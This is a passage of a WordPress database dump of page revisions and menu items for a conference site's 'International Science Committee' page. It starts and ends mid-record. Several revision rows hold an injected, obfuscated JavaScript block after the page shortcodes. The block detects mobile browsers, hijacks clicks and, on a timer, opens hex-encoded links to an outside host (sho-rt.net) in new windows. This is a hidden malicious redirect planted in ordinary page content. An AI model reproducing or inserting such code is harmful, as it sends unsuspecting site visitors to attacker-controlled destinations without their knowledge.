_0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','International Science Committee','','inherit','closed','closed','','2876-revision-v1','','','2022-10-19 03:53:33','2022-10-19 03:53:33','',2876,'https://gsw2023.com/?p=2880',0,'revision','',0),
(2881,1,'2022-10-19 03:59:50','0000-00-00 00:00:00','','','','draft','closed','closed','','','','','2022-10-19 03:59:50','0000-00-00 00:00:00','',0,'https://gsw2023.com/?p=2881',1,'nav_menu_item','',0),
(2882,1,'2022-10-19 04:00:36','2022-10-19 04:00:36','[vc_row][vc_column][dt_team_masonry post_type=\"posts\" order=\"asc\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" posts=\"\"][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','International Science Committee','','inherit','closed','closed','','2876-revision-v1','','','2022-10-19 04:00:36','2022-10-19 04:00:36','',2876,'https://gsw2023.com/?p=2882',0,'revision','',0),
(2883,1,'2022-10-19 04:01:09','0000-00-00 00:00:00','','International Science Committee','','draft','closed','closed','','','','','2022-10-19 04:01:09','0000-00-00 00:00:00','',0,'https://gsw2023.com/?p=2883',1,'nav_menu_item','',0),
(2884,1,'2022-10-19 04:01:42','0000-00-00 00:00:00','','International Science Committee','','draft','closed','closed','','','','','2022-10-19 04:01:42','0000-00-00 00:00:00','',0,'https://gsw2023.com/?p=2884',1,'nav_menu_item','',0),
(2885,1,'2022-10-19 04:02:49','0000-00-00 00:00:00','','International Science Committee','','draft','closed','closed','','','','','2022-10-19 04:02:49','0000-00-00 00:00:00','',0,'https://gsw2023.com/?p=2885',1,'nav_menu_item','',0),
(2886,1,'2022-10-19 04:03:18','0000-00-00 00:00:00','','International Science Committee','','draft','closed','closed','','','','','2022-10-19 04:03:18','0000-00-00 00:00:00','',0,'https://gsw2023.com/?p=2886',1,'nav_menu_item','',0),
(2887,1,'2022-10-19 04:06:23','0000-00-00 00:00:00','','International Science Committee','','draft','closed','closed','','','','','2022-10-19 04:06:23','0000-00-00 00:00:00','',0,'https://gsw2023.com/?p=2887',1,'nav_menu_item','',0),
(2888,1,'2022-10-19 04:06:23','0000-00-00 00:00:00','','International Science Committee','','draft','closed','closed','','','','','2022-10-19 04:06:23','0000-00-00 00:00:00','',0,'https://gsw2023.com/?p=2888',1,'nav_menu_item','',0),
(2889,1,'2022-10-19 04:06:24','0000-00-00 00:00:00','','International Science Committee','','draft','closed','closed','','','','','2022-10-19 04:06:24','0000-00-00 00:00:00','',0,'https://gsw2023.com/?p=2889',1,'nav_menu_item','',0),
(2890,1,'2022-10-19 04:06:24','0000-00-00 00:00:00','','International Science Committee','','draft','closed','closed','','','','','2022-10-19 04:06:24','0000-00-00 00:00:00','',0,'https://gsw2023.com/?p=2890',1,'nav_menu_item','',0),
(2891,1,'2022-10-19 04:06:24','0000-00-00 00:00:00','','International Science Committee','','draft','closed','closed','','','','','2022-10-19 04:06:24','0000-00-00 00:00:00','',0,'https://gsw2023.com/?p=2891',1,'nav_menu_item','',0),
(2892,1,'2022-10-19 04:06:24','0000-00-00 00:00:00','','International Science Committee','','draft','closed','closed','','','','','2022-10-19 04:06:24','0000-00-00 00:00:00','',0,'https://gsw2023.com/?p=2892',1,'nav_menu_item','',0),
(2893,1,'2022-10-19 04:06:49','0000-00-00 00:00:00','','International Science Committee','','draft','closed','closed','','','','','2022-10-19 04:06:49','0000-00-00 00:00:00','',0,'https://gsw2023.com/?p=2893',1,'nav_menu_item','',0),
(2894,1,'2022-10-19 04:06:53','0000-00-00 00:00:00','','International Science Committee','','draft','closed','closed','','','','','2022-10-19 04:06:53','0000-00-00 00:00:00','',0,'https://gsw2023.com/?p=2894',1,'nav_menu_item','',0),
(2895,1,'2022-10-19 04:06:53','0000-00-00 00:00:00','','International Science Committee','','draft','closed','closed','','','','','2022-10-19 04:06:53','0000-00-00 00:00:00','',0,'https://gsw2023.com/?p=2895',1,'nav_menu_item','',0),
(2896,1,'2022-10-19 04:10:07','0000-00-00 00:00:00','','International Science Committee','','draft','closed','closed','','','','','2022-10-19 04:10:07','0000-00-00 00:00:00','',0,'https://gsw2023.com/?p=2896',1,'nav_menu_item','',0),
(2897,1,'2022-10-19 04:16:56','0000-00-00 00:00:00','','International Science Committee','','draft','closed','closed','','','','','2022-10-19 04:16:56','0000-00-00 00:00:00','',0,'https://gsw2023.com/?p=2897',1,'nav_menu_item','',0),
(2898,1,'2022-10-17 09:50:27','2022-10-17 09:50:27','[vc_row][vc_column][dt_team_masonry post_type=\"posts\" order=\"asc\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" posts=\"\"][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0